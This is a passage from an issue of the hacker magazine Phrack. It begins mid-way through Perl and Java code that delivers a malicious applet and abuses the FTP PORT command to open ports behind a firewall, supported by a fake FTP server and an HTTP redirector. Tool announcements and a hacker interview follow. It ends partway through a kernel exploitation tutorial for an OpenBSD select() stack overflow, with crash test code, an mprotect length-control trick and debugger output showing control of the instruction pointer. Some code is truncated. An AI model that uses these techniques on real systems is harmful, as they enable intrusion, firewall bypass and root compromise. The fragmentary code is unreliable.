		print $conn $classcontent;
		print "Injected to ", $conn->peerhost(), "\n";
	} else {
		print $conn "<HTML>".
		            "<APPLET CODE=\"$classfile\" WIDTH=1 HEIGHT=1>".
#!/usr/bin/perl -w

$ENV{"PATH"} = $ENV{"PATH"}."/usr/lib/java/bin";

print "Creating apropriate Java class-file for opeing port > 1023\n";
print "Enter IP to connect to on port 21 (e.g. ''):";
my $ip = <STDIN>; chop($ip);
print "Enter port to open:";
my $port = <STDIN>; chop($port);
my $p1 = int $port/256;
my $p2 = $port%256;

open O, ">" or die $!;
print O<<EOF;

import java.applet.*;
import java.util.*;

public class eftepe extends Applet {

public void init()
	try {
		Socket s = new Socket("$ip", 21);
		OutputStream os = s.getOutputStream();
		BufferedReader in = new BufferedReader(new InputStreamReader(s.getInputStream()));
		PrintWriter pw = new PrintWriter(os, true);
		pw.println("USER ftp\\r\\n");
		pw.println("PASS ftp\\r\\n");
		String port = new String("PORT ");
		String me = InetAddress.getLocalHost().getHostAddress();
		port += me.replace('.', ',');
		port += ",$p1,$p2\\r\\n";
	} catch (Exception e) {


print "Compiling into classfile...\n";
print "Done. Results are in eftepe.class\n";


#!/usr/bin/perl -w

use IO::Socket;

my $sock = new IO::Socket::INET->new(Listen => 10,
                                     LocalPort => 21,
                                     Reuse => 1) or die $!;
my $conn;

for (;;) {
	$conn = $sock->accept();
	if (fork() > 0) {
	print $conn "220 ready\r\n";
	<$conn>;  # user
	print $conn "331 Password please\r\n";
	<$conn>;  # pass
	print $conn "230 Login successful\r\n";
	<$conn>;  #port
	print $conn "200 PORT command successful.\r\n";
	exit 0;

#!/usr/bin/perl -w

# Simple HTTP Redirector

# iptables -A PREROUTING -t nat -p tcp --dport 80 -j REDIRECT --to-port 8888

use IO::Socket;

sub usage
	print "Usage: $0 <IP|Host>\n".
	      "\t\tIP|Host -- IP or Host to redirect HTML reuests to\n\n";

my $r = shift || usage();
my $redir = "HTTP/1.0 301 Moved Permanently\r\n".
            "Location: http://$r:8080\r\n\r\n";

my $sock = new IO::Socket::INET->new(Listen => 10,
                                     LocalPort => 8888,
                                     Reuse => 1) or die $!;
my $conn;

for (;;) {
	next unless $conn = $sock->accept();
	if (fork() > 0) {
	my $request = <$conn>;
	print $conn "$redir";

#!/usr/bin/perl -w

use IO::Socket;

sub usage
	print "Usage: $0 <Host> <Port>\r\n";
	exit 0;

my $a = shift || usage();
my $b = shift || usage();

my $conn = IO::Socket::INET->new(PeerAddr => $a,
                                 PeerPort => $b,
                                 LocalPort => 20,
                                 Type => SOCK_STREAM,
                                 Proto => 'tcp') or die $!;

print $conn "GOTCHA\r\n";


# sample FTP session tracked firewall for 2.4 linux kernels
# modprobe ip_conntrack_ftp

iptables -F

iptables -A INPUT -p tcp --sport 21 -m state --state ESTABLISHED -j ACCEPT
iptables -A OUTPUT -p tcp --dport 21 -m state --state NEW,ESTABLISHED -j ACCEPT

iptables -A INPUT -p tcp --sport 20 -m state --state ESTABLISHED,RELATED -j ACCEPT
iptables -A OUTPUT -p tcp --dport 20 -m state --state ESTABLISHED -j ACCEPT

#iptables -A INPUT -p tcp --syn -j LOG
iptables -A INPUT -p tcp --syn -j DROP

|=[ EOF ]=---------------------------------------------------------------=|


                             ==Phrack Inc.==

               Volume 0x0b, Issue 0x3c, Phile #0x04 of 0x10

|=--------------------=[ T O O L Z   A R M O R Y ]=----------------------=|
|=---------=[ packetstorm <>  ]=-------=|

This new section, Phrack Toolz Armory, is dedicated to tool annoucements.
We will showcast selected tools of relevance to the computer underground
which have been released recently. The tools for #60 have been selected
in teamwork by the Packet Storm staff and Phrack staff.

Drop us a mail if you develop something that you think is worth of being
mentioned here.

   1 - nmap 3.1 Statistics Patch
   2 - thc-rut
   3 - Openwall GNU/*/Linux (Owl) 1.0
   4 - Stealth Kernel Patch
   5 - Memfetch
   6 - Lcrzoex
----[ 1 - NMAP 3.1 Statistics Patch

URL     :
Author  : vitek[at] 
Comment : The Nmap 3.10ALFA Statistics Patch adds the -c switch which
          guesses how much longer the scan will take, shows how many ports
          have been tested, resent, and the ports per second rate.  Useful
	  for scanning firewalled hosts.

----[ 2 - thc-rut

URL     :
Author  : anonymous[at]
Comment : RUT (aRe yoU There, pronouced as 'root') is your first knife on
          foreign network. It gathers informations from local and remote
          It offers a wide range of network discovery utilities
          like arp lookup on an IP range, spoofed DHCP request, RARP,
          BOOTP, ICMP-ping, ICMP address mask request, OS fingerprinting,
          high-speed host discovery, ...

          THC-RUT comes with a OS host Fingerprinter which determines the
	  remote OS by open/closed port characteristics, banner matching
	  and nmap fingerprinting techniques (T1, tcpoptions).

          The fingerprinter has been developerd to quickly (10mins)
          categorize hosts on a Class B network. Information sources are
          (amoung others) SNMP replies, telnetd (NVT) negotiation options,
          generic Banner Matching, HTTP-Server version, DCE request and
          tcp options. It is compatible to the nmap-os-fingerprints
          database and comes in addition to this with his own perl regex
          capable fingerprinting database (thcrut-os-fingerprints).

----[ 3 - Openwall GNU/*/Linux (Owl) 1.0 (Released 2002-10-13)

URL     :
Author  : Solar Designer and other hackers.
Comment : Openwall Linux is the Hacker's choice platform. The security
          has been defined by people who know what they are doing. Owl
          comes without any useless services running by default, no RPM
          dependencies headache, full featured environment for
          developers, a large number of usefull tools and a BSD-port-like
          update mechanism. It's for people who prefer vi over
          click/drag-and-drop sickness to configure the system.

          Openwall GNU/*/Linux (Owl) includes a pre-built copy of John
          the Ripper password cracker ready for use without requiring
	  another OS (life system!) and without having to install on a
	  hard disk (although that is supported). The CD-booted system
	  is fully functional, you may even let it go multi-user with
	  virtual consoles and remote shell access.

          John the Ripper is a fast password cracker, currently
	  available for many flavors of Unix (11 are officially
          supported, not counting different architectures), DOS, Win32,
	  and BeOS. Its primary purpose is to detect weak Unix
	  passwords, but a number of other hash types are supported

          This is probably the most secure linux distribution out there.

----[ 4 - Stealth Kernel Patch

URL     :
Author  : Sean Trifero <sean[at]>
Comment : The Stealth Kernel Patch for Linux v2.2.22 makes the linux kernel
	  discard the packets that many OS detection tools use to query the
	  TCP/IP stack. Includes logging of the dropped query packets and
	  packets with bogus flags. Does a very good job of confusing nmap
	  and queso.

----[ 5 - Memfetch

URL     :
Author  : Michal Zalewski <lcamtuf[at]>
Comment : Memfetch dumps the memory of a program without disrupting its
	  operation, either immediately or on the nearest fault condition
	  (such as SIGSEGV). It can be used to examine suspicious or
	  misbehaving processes on your system, verify that processes are
          what they claim to be, and examine faulty applications using your
	  favorite data viewer so that you are not tied to the inferior
	  data inspection capabilities in your debugger.

----[ 6 - Lcrzoex

URL     :
 (front end)
Author  : Laurent Constantin <[email protected]>
Comment : Lcrzoex contains over 400 tools to test an Ethernet/IP
          network. It runs under Linux, Windows, FreeBSD, OpenBSD and
	  Solaris. Features:

		  - sniff/spoof/replay
		  - syslog/ftp/dns/http/telnet clients
		  - ping/traceroute
		  - web spider
		  - tcp/web backdoor
		  - data conversion

|=[ EOF ]=---------------------------------------------------------------=|

-------------------------------------------------------------------------------- cat .bash_history

                            ==Phrack Inc.==

              Volume 0x0b, Issue 0x3c, Phile #0x05 of 0x10

|=--------------=[ P R O P H I L E   O N   H O R I Z O N ]=--------------=|
|=------------------------=[ Phrack Staff ]=-----------------------------=|

|=---=[ Specification

                  Handle: horizon
                     AKA: humble, john
           Handle origin: It sounded neat.
               catch him: I'm very easy to find.
        Age of your body: mid 20s
             Produced in: USA
         Height & Weight: 5'11" ~165 lbs.
                    Urlz: Nope
               Computers: A couple of decent x86 boxes and a lot of
                          older stuff..
               Member of: CostCo
                Projects: Currently, stuff for work, and a few personal
                          things that really aren't that interesting.

|=---=[ Favorite things

          Women: Creativity, intelligence, a sense of style.
           Cars: German
          Foods: Indian, Thai, Korean, Greek, Japanese, Lean Pockets
        Alcohol: Helles, Redbull & Vodka
          Music: Screeching Weasel, Fugazi, Stretch Armstrong,
                 Bad Religion, some electronic
         Movies: Big Lebowski, Office Space, Austin Powers, Memento, Pi
Books & Authors: Sigh.. I wish I read more these days.
           Urls: Can't think of any...
         I like: Engaging conversation. Sincerity and conviction.
                 Solving difficult problems. Mr. Show. Gummi Bears.
      I dislike: Unwarranted arrogance. Unwarranted Gummi Bears.

|=---=[ Life in 3 sentences

I've never been normal. I've always felt a sense of purpose. I've tried
to be generous.

|=---=[ Hacker Life

PHRACKSTAFF: You have found quite a lot of bugs in the past and developed
             exploit code for them. Some vulnerabilities required new
             creative exploitation concepts which were not known at that
             time. What drives you into Challenging the exploitation of
             complicated bugs and what methods do you use?  

Well, my motivations have definitely changed over time. I can come
up with several ancillary reasons that have driven me at different times
during my life, and they include both the selfish and the altruistic. But,
I think it really comes down to a compulsion to figure all this stuff

As far as methods, I try to be somewhat systematic in my approach. I
budget a good portion of time for just reading through the program,
trying to get a feel for its architecture and the mindset and techniques
of its authors. This also seems to help prime my subconscious.

I like to start at the lower layers of a program or system and look for
any kind of potential unexpected behavior that could percolate upwards. I
will document each function and brainstorm any potential problems I see
with it. I will occasionally take a break from documentation, and do the
considerably more fun work of tracing back some of my theories to see if
they pan out.

As far as writing exploits, I generally just try to reduce or eliminate
the number of things that need to be guessed.

|=---=[ Passions | What makes you tick

I'm definitely obsessed with computers. One of my original goals in
learning to program as a kid was to develop games, so I've always been
kind of passively interested in that. I'm also interested in artificial

I've been doing Wing Chun kung fu for about two years now, and I find
that to be really rewarding.

I spend a decent bit of my time thinking. I like to read lay-person
oriented overviews of various academic disciplines. I'd really like to
learn more about biology and neuroscience.

|=---=[ Which research have you done or which one gave you the most fun?

I think I've had the most fun when collaborating with others.

|=---=[ Memorable Experiences

Hanging out with sygma, saad, wordsmith, shegget, and all my old irc
friends. Getting into trouble with colonwq. Long, not entirely coherent,
chats with rc.local. :>

The weekend drinking/hacking/coding sessions at neon's place.
boilermakers. Romania. Coding with xaphan. Almost getting fired from my
university job for hacking Microsoft, and then getting let off the hook
when one of their security officers called my boss. Helping joey__ write
his first exploit, and then not understanding how it worked when he had
finished. Working on various stuff with JoC, cham, module, so1o, zorkeres,
binf, and the rest of the r9 guys.

Hanging out with Vacuum and RFP before leaving the US.

The time I spent living in Germany. Working with plaguez and Thomas, two
absurdly brilliant guys. Living with Howard and Sondee.. eating at the
Citta. CCC Camp - Meeting TESO, THC, and many others. linux deathmatch.

Watching people like duke and scut (and many others) get really good, and
hoping that I somehow helped.

Accidentally crashing gatekeeper.

Hanging out in the adm channel. The always interesting discussions with
str and anti. Racing with K2 to write exploits as Sun advisories came

The Firewall-1 speech with Dug and Thomas.

Finally getting my degree.

My european tour with dice. HAL. Meeting silvio. Getting smashed in the
basement of a bar in Poland with the LSD guys. Chilling with Scrippie and
Dvorvak and the members of a Dutch death metal band.

Going to a rave in Miami with JJ and ending up in the keys the day before
a hurricane.

Watching my little brothers grow up.

Tag team coding/auditing with dice.

Working for cool people - Mike, Jim, Pat.

German/reversing lessons from Halvar.

sms's from srpnsrt.

Defcon - meeting digit, cheez, charise, zip, gobbles, i1l, cain, arakis,
caddis, ryan, riley, and so many others.

The fun times I've had in Chicago. Greg's couch. OFP with Paul and
Sergey. The bachelor party with monti and MJ. Meeting the esteemed Sarlo.

|=---=[ What's your architecture of choice? OS of choice?

I tend to use what I'm comfortable with or whatever seems appropriate at
the moment. The three machines that I use most of the time are currently
running XP, Linux, and OpenBSD.

|=---=[ Quotes

"Jesus Christ John McDonald!"


"So, basically, what you are saying is that we should try to find the

"Hey, I just work here..."

|=---=[ Open Interview

Q: When did you start playing with computers?

I got a c64 when I was 6.

Q: When did you had your first contact to the 'scene'?

1997 or so.

Q: When did you for your first time connect to the Internet?

1993. I had a part time job in high school programming for a satellite
research center that had Internet access. From what I recall, I mainly
played around on usenet and ftp sites.

Q: Let's talk a little bit about free research and Copyright. What's your
   opinion about "Copyright on exploits"?

Well, I'm not a lawyer, and I haven't really looked into it. I think that
people should be entitled to do what they want with their work, and that
legal protections are there for a reason. However, I've got no idea what
copyrighting an exploit will actually afford you legally.

Q: If you could turn the clock backward, what would you do different
   in your young life ?

That's a tough one. The Internet has suffered a fair bit for the sake of
my ego. I think I would have handled certain things with more discretion
if I'd had a little more perspective.

|=---=[ One word comments

Give a one word comment to the following topics:

Digital Millennium Copyright Act (DMCA): oceanliner
KIMBLE (the wannabe-hacker)            : hoogedlyboogedly
ADM                                    : fun
NAI                                    : work
THE SCENE                              : which?
Companies buying exploits from hackers : dunno
IRC                                    : idle
CERT                                   : maligned
Full Disclosure Policy                 : careful

|=---=[ Would you work for the government/military? Why or why not?

As much as it suprises me to say it, I don't really have an ideological
opposition to working for my government. I think the combination of
getting a little bit older, spending some time living abroad, and the
recent events in my country has made me more appreciative of certain
things. I think it is safe to say I would do it if I believed I was doing
something positive and I thought it was necessary. Otherwise, I'd avoid
it because it would just make life more complicated.

|=---=[ Please tell our audience a worst case scenario into what the scene
        might turn into.

I guess I could prognosticate about it becoming factionalized, petty,
cruel, insecure, and paranoid, but who would I be kidding?

|=---=[ And if everything works out fine? What's the best case scenario
        you can imagine?

As long as there is a place for new people who show promise, I think things
will be cool.

|=---=[ Any suggestions/comments/flames to the scene and/or specific people?

Think for yourself.

|=---=[ Shoutouts & Greetings

Hi everyone :>

|=[ EOF ]=---------------------------------------------------------------=|


                             ==Phrack Inc.==

               Volume 0x0b, Issue 0x3c, Phile #0x06 of 0x10

|=----------=[ Smashing The Kernel Stack For Fun And Profit ]=----------=|
|=--------------=[ Sinan "noir" Eren <[email protected]> ]=--------------=|

This article presented here is bound to no organization or company.  It is
the author's contrubition to the hacker community at large.  The research
and development in this article is done by the author with NO SUPPORT from
a commercial organization or company. No organization or company should be
held responsible or credited for this article other than the author

--[ Contents

	1 - Introduction

	2 - The vulnerability: OpenBSD select() syscall overflow

	3 - Obstacles encountered in exploitation
	  3.1 - Overcoming the large copyin() problem
	    3.1.1 - mprotect() 4 life!
	  3.2 - Payload storage problem
	  3.3 - Return to user land problem

	4 - Crafting the exploit
	  4.1 - Breakpoints & distance Calculation
	  4.2 - Return address overwrite & execution redirection

	5 - How to gather offsets & symbol addresses
	  5.1 - sysctl() syscall
	  5.2 - sidt technique & _kernel_text search
	  5.3 - _db_lookup() technique	    
	  5.4 - /usr/bin/nm, kvm_open(), nlist()
	  5.5 - %ebp fixup	

	6 - Payload/shellcode creation
	  6.1 - What to achieve
	  6.2 - The payload
	    6.2.1 - p_cred & u_cred
	    6.2.2 - chroot breaking
	    6.2.3 - securelevel
	  6.3 - Get root & escape jail

	7 - Conclusions

	8 - Greetings

	9 - References

	10 - Code

--[ 1 - Introduction

This article is about recent exposures of many kernel level vulnerabilities
and advances in their exploitation which leads to trusted (oops safe) and
robust exploits.

We will focus on 2 recent vulnerabilities in the OpenBSD kernel as our case
studies. Out of the these we will mainly concentrate on exploitation of the
select() system call buffer overflow. The setitimer() arbitrary memory
overwrite vulnerability will be explained in the code section of this
article (as inline comments, so as not to repeat what we have already
covered whilst exploring the select() buffer overflow).

This paper should not be viewed as an exploit construction tutorial, my
goal is, rather, to explore and demonstrate generic ways to exploit stack
overflows and signed/unsigned vulnerabilities in kernel space.

Case studies will be used to demonstrate these techniques, and reusable
*BSD "kernel level shellcodes" -- with many cool features! -- will be

There has been related work done by [ESA] and [LSD-PL], which may
complement this article.

--[ 2 - The Vulnerability: OpenBSD select() syscall overflow

sys_select(p, v, retval)
        register struct proc *p;
        void *v;
        register_t *retval;
        register struct sys_select_args /* {
                syscallarg(int) nd;
                syscallarg(fd_set *) in;
                syscallarg(fd_set *) ou;
                syscallarg(fd_set *) ex;
                syscallarg(struct timeval *) tv;
        } */ *uap = v;
        fd_set bits[6], *pibits[3], *pobits[3];
        struct timeval atv;
        int s, ncoll, error = 0, timo;
        u_int ni;

[1]     if (SCARG(uap, nd) > p->p_fd->fd_nfiles) {
                /* forgiving; slightly wrong */
                SCARG(uap, nd) = p->p_fd->fd_nfiles;
[2]     ni = howmany(SCARG(uap, nd), NFDBITS) * sizeof(fd_mask);
[3]     if (SCARG(uap, nd) > FD_SETSIZE) {


#define getbits(name, x) \
[4]   if (SCARG(uap, name) && (error = copyin((caddr_t)SCARG(uap, name), \
            (caddr_t)pibits[x], ni))) \
                goto done;
[5]     getbits(in, 0);
        getbits(ou, 1);
        getbits(ex, 2);
#undef  getbits


To make some sense out of the code above we need to decipher the SCARG
macro, which is extensively used in the OpenBSD kernel syscall handling

Basically, SCARG() is a macro that retrieves the members of the 'struct
sys_XXX_args' structures.

#define SCARG(p, k)     ((p)->       /* get arg from args 
pointer */
#define SCARG(p, k)     ((p)->k.le.datum)       /* get arg from args 
pointer */

#define syscallarg(x)                                                   \
        union {                                                         \
                register_t pad;                                         \
                struct { x datum; } le;                                 \
                struct {                                                \
                        int8_t pad[ (sizeof (register_t) < sizeof (x))  \
                                ? 0                                     \
                                : sizeof (register_t) - sizeof (x)];    \
                        x datum;                                        \
                } be;                                                   \

Access to structure members is performed via SCARG() in order to preserve
alignment along CPU register size boundaries, so that memory accesses will
be faster and more efficient.

In order to make use of the SCARG() macro, the declarations need to be done
as follows (example for select() syscall arguments):

struct sys_select_args {
[6]     syscallarg(int) nd;
        syscallarg(fd_set *) in;
        syscallarg(fd_set *) ou;
        syscallarg(fd_set *) ex;
        syscallarg(struct timeval *) tv;

The vulnerability can be described as an insufficient check on the 'nd'
argument [6], which is used as the length parameter for userland to kernel
land copy operations.

Whilst there is a check [1] on the 'nd' argument (nd represents the highest
numbered descriptor plus one, in any of the fd_sets), which is checked
against the p->p_fd->fd_nfiles (the number of open descriptors that the
process is holding), this check is inadequate -- 'nd' is declared as signed
[6], so it can be negative, and therefore will pass the greater-than check

Then 'nd' is put through a macro [2], in order to calculate an unsigned
integer, 'ni', which will eventually be used as the the length argument for
the copyin operation.

howmany() [2] is defined as follows (sys/param.h line 175):

#define howmany(x, y)   (((x)+((y)-1))/(y))

Expansion of line [2] will look like as follows:

sys/types.h:157, 169
#define NBBY    8               /* number of bits in a byte */

typedef int32_t fd_mask;
#define NFDBITS (sizeof(fd_mask) * NBBY)        /* bits per mask */
ni = ((nd + (NFDBITS-1)) / NFDBITS)  * sizeof(fd_mask);
ni = ((nd + (32 - 1)) / 32) * 4

Calculation of 'ni' is followed by another check on the 'nd' argument [3].
This check is also passed, since OpenBSD developers consistently forget
about the signedness checks on the 'nd' argument. Check [3] was done to see
if the space allocated on the stack is sufficient for the following copyin
operations, and, if not, then sufficient heap space will be allocated.

Given the inadequacy of the signed check, we'll pass check [3] (>
FD_SETSIZE), and will continue using stack space. This will make our life
much easier, given that stack overflows are much more trivially exploited
than heap overflows. (Hopefully, I'll write a follow-up paper that will
demonstrate kernel-land heap overflows in the future).

Finally, the getbits() [4,5] macro is defined and called in order to
retrieve user supplied fd_sets (readfds, writefds, exceptfds -- these
arrays contain the descriptors to be tested for 'ready for reading', ready
for writing' or 'have an exceptional condition pending').

For exploitation purposes we don't really care about the layout of the
fd_sets -- they can be treated as any simple char buffer aiming to overflow
its boundaries and overwrite the saved ebp and saved eip.

With this simple test code, we can reproduce the overflow:

#include <stdio.h>
#include <sys/types.h>

	char *buf;
	buf = (char *) malloc(1024);
	memset(buf, 0x41, 1024);
	select(0x80000000, (fd_set *) buf, NULL, NULL, NULL);
What happens is; system call number 93 (SYS_select) is dispatched to
handler sys_select() by the syscall() function, with all user land supplied
arguments bundled into a sys_select_args structure.

'nd', being 0x80000000 (the smallest negative number for signed 32bit) has
gone through the size check [1] and, later, the howmany() macro [2]
calculates unsigned integer 'ni' as 0x10000000. The getbits() macro [5] is
then called with the address of buf (user land, heap) which expands to the
copyin(buf, kernel_stack, 0x10000000) operation.

copyin() starts to copy the userland buffer to the kernel stack, a long at
a time (0x10000000/4 times). However, this copy operation won't ever fully
succeed, as the kernel will run out of per-process stack trying to copy
such a huge buffer from userland -- and will crash on an out of bounds
write operation.

--[ 3 - Obstacles encountered in exploitation

     - copyin(uaddr, kaddr, big_number) problem

First and the most obvious problem is to take control of the size argument
'ni' passed to the copyin operation, since this number is derived from the
user supplied 'nd' argument which, must be negative, we'll never be able to
construct a reasonably "big" number. Actually the "smallest" positive
number we can construct is 0x10000000. As we have already find out that,
this number will cause us to hit the end of kernel stack and kernel will
panic. This is our first obstacle and we'll overcome it by exploring how
copyin() works in the following section.

      - payload storage problem

This is a typical problem for every type of exploit (user or kernel land).
Determining where the most appropriate place is to store the
payload/shellcode.  This problem is rather simple to overcome in kernel
land exploits and we'll talk about the proper solution. 

      - clean return to user land problem

Another problem arises after we overwrite the saved return address and gain
control, at that point we can be real imaginative on the payload, but we'll
run into the trouble of how to return back to user land and be able to
enjoy our newly altered kernel space! 

--[ 3.1 - Overcoming The Large copyin() Problem

To be able to solve this problem, we need to read through the copyin() and
trap() functions and understand their internals.

We shall start by understanding copyin() user to kernel copy primitive, my
comments will be inlined:


        pushl   %esi
        pushl   %edi

Save %esi, %edi .

        movl    _C_LABEL(curpcb),%eax

Move the current process control block address (_curpcb) into %eax .
_C_LABEL() is a simple macro that will add an underscore sign to the
beginning of the symbol name. See sys/arch/i386/include/asm.h:66

The process control block is a per-process kernel structure that holds the
current execution state of a process and differs based on machine
architecture. It consists of: stack pointer, program counter, general-
purpose registers, memory management registers and some other architecture
depended members such as per process LDT's (i386) and so on. The *BSD
kernel extends the PCB with software related entries, such as the
"copyin/out fault recovery" handler (pcb_onfault). Each process control
block is stored and referenced through the user structure. See
sys/user.h:61 and [4.4 BSD].

[1]    pushl   $0

Push a ZERO on the stack; this will make sense at the epilog or the
_copy_fault function, which has the matching 'popl' instruction.

[2]    movl    $_C_LABEL(copy_fault),PCB_ONFAULT(%eax)

Move _copy_fault's entry address into the process control block's
pcb_onfault member. This simply installs a special fault handler for
'protection', 'segment not present' and 'alignment' faults.  copyin()
installs its own fault handler, _copy_fault, we'll get back to this when
exploring the trap() code, since processor faults are handled there.

        movl    16(%esp),%esi
        movl    20(%esp),%edi
        movl    24(%esp),%eax

Move the incoming first, second and third arguments to %esi, %edi, %eax
respectively. %esi being the user land buffer, %edi the destination kernel
buffer and %eax the size.

     * We check that the end of the destination buffer is not past the end
     * of the user's address space.  If it's not, then we only need to
     * check that each page is readable, and the CPU will do that for us.
        movl    %esi,%edx
        addl    %eax,%edx

This addition operation is to verify if the user land address plus the size
(%eax) is in legal user land address space. The user land address is moved
to %edx and then added to the size (ubuf + size), which will point to the
supposed end of the user land buffer.

        jc      _C_LABEL(copy_fault)

This is a smart check to see if previous addition operation has an integer
over-wrap issue. e.g: the user land address being 0x0ded and size being
0xffffffff -- this unsigned arithmetic operation will overlap and the
result is going to be 0x0dec. By design, the CPU will set the carry flag on
such condition and 'jc' jump short on carry flag set instruction will take
us to _copy_fault function which do some clean up and return EFAULT .

        cmpl    $VM_MAXUSER_ADDRESS,%edx
        ja      _C_LABEL(copy_fault)

Followed by the range check: whether or not the user land address plus size
is in valid user land address space range. A comparison is done against the
VM_MAXUSER_ADDRESS constant, which is the end of the user land stack
(0xdfbfe000 through obsd 2.6-3.1). If the sum (%edx) is above
VM_MAXUSER_ADDRESS 'ja' (jump above) instruction will make a short jump to
_copy_fault , eventually leading to the termination of the copy operation.

3:      /* bcopy(%esi, %edi, %eax); */

Clear the direction flag, DF = 0, means that the copy operation is going to
increment the index registers '%esi and %edi' .

        movl    %eax,%ecx
        shrl    $2,%ecx

Do the copy operation long at a time, from %esi to %edi .

        movb    %al,%cl
        andb    $3,%cl

Copy the remaining (size % 4) data, byte at a time.

        movl    _C_LABEL(curpcb),%edx
        popl    PCB_ONFAULT(%edx)

Move the current process control block address into %edx, and then pop the
first value on the stack into the pcb_onfault member (ZERO [1] pushed
earlier). This means, the special fault handler is cleared from the

        popl    %edi
        popl    %esi

Restore the old values of %edi, %esi .

        xorl    %eax,%eax

Do a return with a return value of zero: Success .


In the case of faults and failures in checks at copyin() this is where we

        movl    _C_LABEL(curpcb),%edx
        popl    PCB_ONFAULT(%edx)

Move the current process control block address into %edx and then pop the
first value on the stack into the pcb_onfault member (ZERO [1] pushed
earlier). This clears the special fault handler from the process.

        popl    %edi
        popl    %esi

Restore the old values of %edi, %esi .

        movl    $EFAULT,%eax

Do a return with a return value of EFAULT (14): Failure .

After this long exploration of the copyin() function we'll just take a
brief look at trap() and check how pcb_onfault is implemented. trap() is
the main interface to exception, fault and trap handling of the BSD kernel.

trap.h:51:#define    T_PROTFLT        4      /* protection fault */
trap.h:63:#define    T_SEGNPFLT      16      /* segment not present fault 
trap.h:54:#define    T_ALIGNFLT       7      /* alignment fault */

        struct trapframe frame;
        register struct proc *p = curproc;
        int type = frame.tf_trapno;
        switch (type) {

line: 269

        case T_PROTFLT:
        case T_SEGNPFLT:
        case T_ALIGNFLT:
                /* Check for copyin/copyout fault. */
[1]             if (p && p->p_addr) {
[2]                     pcb = &p->p_addr->u_pcb;
[3]                     if (pcb->pcb_onfault != 0) {
[4]                             frame.tf_eip = (int)pcb->pcb_onfault;


Faults such as 'protection', 'segment not present' and 'alignment' are
handled all together, through a switch statement in trap() code. The
appropriate case for the mentioned faults in trap() , initially checks for
the existence of the process structure and the user structure [1] then
loads the process control block from the user structure [2], check if the
pcb_onfault is set [3] if its set, if so, the instruction pointer (%eip) of
the control block is overwritten with the value of this special fault
handler [4]. After the process is context switched and given the cpu, it
will start running from the new handler code in kernel space. In the case
of copyin() , execution will be redirected to _copy_fault . 

Armoured with all this knowledge, we can now provide a solution for the
'big size copyin()' problem.

--[ 3.1.1 - mprotect() 4 life!

x86 cpu memory operations such like trying to read from write only (-w-)
page or trying to write to a read only (r--) or no access (---) page and
some other combinations will throw out a protection fault which will be
handled by trap() code as shown above. 

This basic functionality will allow us to write as many bytes into kernel
space as we wish, no matter how big the size value actually is. As seen
above, the trap() code checks for pcb_onfault handler for protection faults
and redirects execution to it. In order to stop copying from user land to
kernel land, we will need to turn off the read protection bit of any
certain page following the overflow vector and achieve our goal.

|    rwx    | --> Dynamically allocated PAGE_SIZEd 
|           |     user land memory
|           |
|xxxxxxxxxxx| --> Overflow vector (fd_set array)
-------------     (saved %ebp, %eip overwrite values)
|    -w-    |
|           |
|           | --> Dynamically allocated PAGE_SIZEd 
|           |     consecutive memory, PROT_WRITE

The way to control the overflow as described in the diagram is to allocate
2 PAGE_SIZEd memory chunks and fill the end of the first page with overflow
data (exploitation vector) and then turn off the read protection bit of the
following page. 

At this stage we also run into another problem (albeit rather simple to
overcome). PAGE_SIZE is 4096 in x86 and 4096 bytes of overflowed stack will
crash the kernel at an earlier stage (before we take control). 

Actually for this specific overflow saved %ebp and saved %eip is 192 and
196 bytes away from the overflowed buffer, respectively. So, what we'll do
is allocate 2 pages and pass the fd_set pointer as 'second_page - 200'.
Then copyin() will start copying just 200 bytes before the end of the
readable page and will hit the non readable page right after. An expection
will be thrown and trap() will handle the fault as explained, 'protection
fault' handler will check pcb_onfault and set the instruction pointer of
the current PCB to the address of the handler, in this case _copy_fault.
_copy_fault will return EFAULT. 

If we go back to the sys_select() code getbits() macro [4] will check for
the return value and will go to 'done' label on any value other than
success (0). At this point sys_select() set the error code (errno) and
return to syscall() (syscall dispatcher).

Here is the test code to verify the mprotect technique:

#include <stdio.h>
#include <sys/types.h>
#include <sys/mman.h>
#include <unistd.h>

        char *buf;
	u_long pgsz = sysconf(_SC_PAGESIZE);

        buf = (char *) malloc(pgsz * 3);
	/* asking for 3 pages, just to be safe */
	if(!buf) { perror("malloc"); exit(-1); }
        memset(buf, 0x41, pgsz*3); /* 0x41414141 ;) */

	buf = (char *) (((u_long) buf & ~pgsz) + pgsz);
	/* actually, we'r using the 2. and 3. pages*/

	if(mprotect((char *) ((u_long) buf + pgsz), (size_t) pgsz,
		PROT_WRITE) < 0)
		perror("mprotect"); exit(-1);
	/* we set the 3rd page as WRITE only, 
	 * anything other than READ is fine 
	select(0x80000000, (fd_set *) ((u_long) buf + pgsz - 200), NULL,

- The ddb> kernel debugger

To be able to debug the kernel we will need to set up the ddb kernel
debugger. Type the following commands to make sure ddb is set and don't
forget that, you should have some sort of console access to be able to
debug the kernel. (Physical access, console cable or those funky network
console devices...)

bash-2.05a# sysctl -w ddb.panic=1
ddb.panic: 1 -> 1
bash-2.05a# sysctl -w ddb.console=1
ddb.console: 1 -> 1

The first sysctl command configures ddb to kick in on kernel panics. The
latter will set up ddb accessible from console at any given time, with the
ESC+CTRL+ALT key combination.

There is no way to explore kernel vulnerabilities without many panic()s
getting in the way, so lets get dirty.

bash-2.05a# gcc -o test2 test2.c 
bash-2.05a# sync
bash-2.05a# sync
bash-2.05a# uname -a
OpenBSD kernfu 3.1 GENERIC#59 i386
bash-2.05a# ./test2
uvm_fault(0xe4536c6c, 0x41414000, 0, 1) -> e
kernel: page fault trap, code=0
Stopped at	0x41414141:uvm_fault(0xe4536c6c, 0x41414000, 0, 1) -> e

ddb> trace
_kdb_trap(6,0,e462af08,1) at _kdb_trap+0xc1
_trap() at _trap+0x1b0
--- trap (number 6) ---

What all this means is that a page fault trap was taken from for address
0x41414141 and since this is an invalid address for kernel land, it was not
able to be paged in (such like every illegal address reference) which lead
to a panic(). This means we are on the right track and indeed overwrite the
%eip since the page 0x41414000 was attempted to loaded into memory.

Type following for a clean reboot.
ddb> boot sync

Lets verify that we gain the control by overwriting the %eip - here is how
to set the appropriate breakpoints: 


ddb> x/i _sys_select,130
_sys_select:	pushl	%ebp
_sys_select+0x1:	movl	%esp,%ebp
_sys_select+0x424:	leave
_sys_select+0x425:	ret
_sys_select+0x426:	nop
ddb> break _sys_select+0x425
ddb> cont
^M	--> hit enter!

At this stage some other process might kick ddb> in because of its use of
the select syscall, just type 'cont' on the ddb> prompt and hit CR.

bash-2.05a# ./test2 
ddb> print $ebp
ddb> x/i $eip
_sys_select+0x425:	ret
ddb> x/x $esp
0xe461df3c:	41414141 --> saved instruction pointer!
